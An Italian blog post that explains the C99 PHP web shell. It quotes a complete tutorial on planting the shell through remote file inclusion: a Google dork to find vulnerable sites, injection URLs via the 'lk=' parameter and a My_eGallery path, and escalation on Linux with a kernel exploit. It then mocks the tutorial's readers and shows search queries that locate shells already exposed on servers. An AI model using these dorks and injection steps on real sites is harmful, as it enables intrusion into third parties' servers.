Un Altra guida offerta da noi di Jaco-Blog vi aiuterà a settare al meglio la shell c99.

La C99.php è una shell creata dal Captain Crunch Security Team (http://ccteam.ru) (Per chi non lo sapesse è il nomignolo di Draper), ed è davvero un bel giocattolino se lo si sa usare… Peccato che non va sempre così..
Usare la c99 è veramente semplice, può essere usata per eseguire dei comandi su una shell buggata direttamente in unicode su una barra dell’indirizzo e una volta uppata è un ottima backdoor.Il menù tra l’altro è veramente semplice ed intuitivo e permette di sfogliare tutti i file e le cartelle del server ospite con la semplicità di un explorer, eseguire comandi da root e varie utility di cui è corredata…

Ma sono un lamerello un po duro, l’inglese non lo capisco, ora vedo se qualche vero hacker ha scritto una qualche semplice guida su come usarla bene..

Trovo questo che ci dice come sfruttare l’autoiniezione con una c99:

——–INIZIO———

Che cos’è una shell C99 e a cosa serve? E’ una shell creata in PHP, usata per sfruttare il bug dell’autoiniezione.

Cosa permette di fare? Inserendo la shell C99 in un sito vulnerabile, ci ritroveremo davanti ad un pannello con tutti i file del sito web (come in FTP), ci permetterà di modificarli, eliminarli, o fare altro, come fossimo degli admin!

Usiamo Google per cercare il sito-vittima! Andate su Google e cercate inurl:index.php?lk=

Dove funziona il bug? Possiamo sfruttare il bug nella sezione My_Egallery o nella Index.

Hostiamo la shell C99! facciamo finta di averla hostata su http://www.ciaociao.it/c99.php [*]

Iniettiamo la shell C99! Abbiamo trovato il sito della vittima? Benissimo! Possiamo iniettare la shell C99. Se il sito è http://www.lolol.it/index.php e tutto il resto… nella barra degli indirizzi sostituite http://www.lolol.it/index.php con http://www.lolol.it/index.php?lk=http://ww…ciao.it/c99.php.

Sistema Windows o Linux? Se va bene riuscirete ad accedere al pannello. Se il sistema è Windows si ha già l’accesso al root, se il sistema è Linux dovete exploitare il kernel con un exploit chiamato KMOD.

E’ possibile iniettare la shell anche su My_Egallery! E’ possibile iniettare la shell C99 anche sulla sezione My_Egallery! Per farlo ecco la stringa da inserire nella barra degli indirizzi: http://www.lolol.it/modules/My_eGallery/pu…ciao.it/c99.php

——-FINE———–

Ecco un buon tutorial veramente completo. TENGO A PRECISARE CHE LA GUIDA E’ COMPLETA NON HO TAGLIATO NE’ TRALASCIATO NESSUN PEZZO. INOLTRE NE ESISTONO DECINE UGUALI, DECINE DI SITI CHE PARLANO DELLA C99 COME DELLE LORO TASCHE, CHE MAGARI LA TRADUCONO E LA MODIFICANO MA NON CAPISCO NULLA ORA VEDIAMO XCHè…

Questa cosa si conosce da un po eppure ho notato che sono sempre più in aumento le shell c99 su server non capisco… Ah adesso forse si…

Vedete dove ho messo l’[*] ?? Bene il nostro amichevole hacker di quartiere sta dicendo di mettere la c99 su un proprio spazio o server….

Bene bravo. Lo sai quanti imbecilli (un po meno di te perchè stanno seguendo una guida..) Hanno fatto esattamente come hai detto e si sono messi una backdoor sul sito?? Non ci cred i/dete ??

Andiamo su google e scriviamo (proxatevi):

C99Shell v. 1.0 beta (21.05.2005)

o se esistono altre versioni forse è meglio cercare:

C99Shell v

RISULTATO:

- c99shell – [ Traduci questa pagina ]
c99shell v. 1.0 beta (21.05.2005) powered by Captain Crunch Security Team | http://ccteam.ru
WWW.TOPOGIGIO.IT/SHELL.PHP

- c99shell – [ Traduci questa pagina ]
c99shell v. 1.0 beta (21.05.2005) powered by Captain Crunch Security Team | http://ccteam.ru
WWW.SONOIDIOTA.IT/C99.PHP

- c99shell – [ Traduci questa pagina ]
c99shell v. 1.0 beta (21.05.2005) powered by Captain Crunch Security Team | http://ccteam.ru
WWW.ILPIUGRANDEHACKERDELMONDOMATENGOLAC99SULSERVER.COGL/SDVI/PERSONAL/INDEX.PHP

E CE NE SONO PAGINE E PAGINE…. MI DISPIACE SOLTANTO DI ALIMENTARE GENTE CHE RIBUCHERA’ SERVER E NUOVI CASINI, MA C’E’ TROPPA GENTE INUTILE SU INTERNET AL GIORNO D’OGGI…

Cmq basterebbe mettere un robots.txt nella dir principale con scritto:

User-agent: *
Disallow: /dirdellac99/

ed i motori di ricerca nn guardano lì dentro.

Ad esempio… ma in realtà nn è nemmeno molto furba questa soluzione (molti di voi avranno capito perchè)

La cosa ideale è settare la c99 in modalità sicura, fatevelo spiegare da quella gente come si fa se è in grado.. Se non lo siete correte il rischio di farvi bucare il sito

-------- Ti è piaciuto questo articolo? Condividilo sul tuo profilo di: --------

---------------------------------------------
Nessun Post Correlato.

I Commenti sono chiusi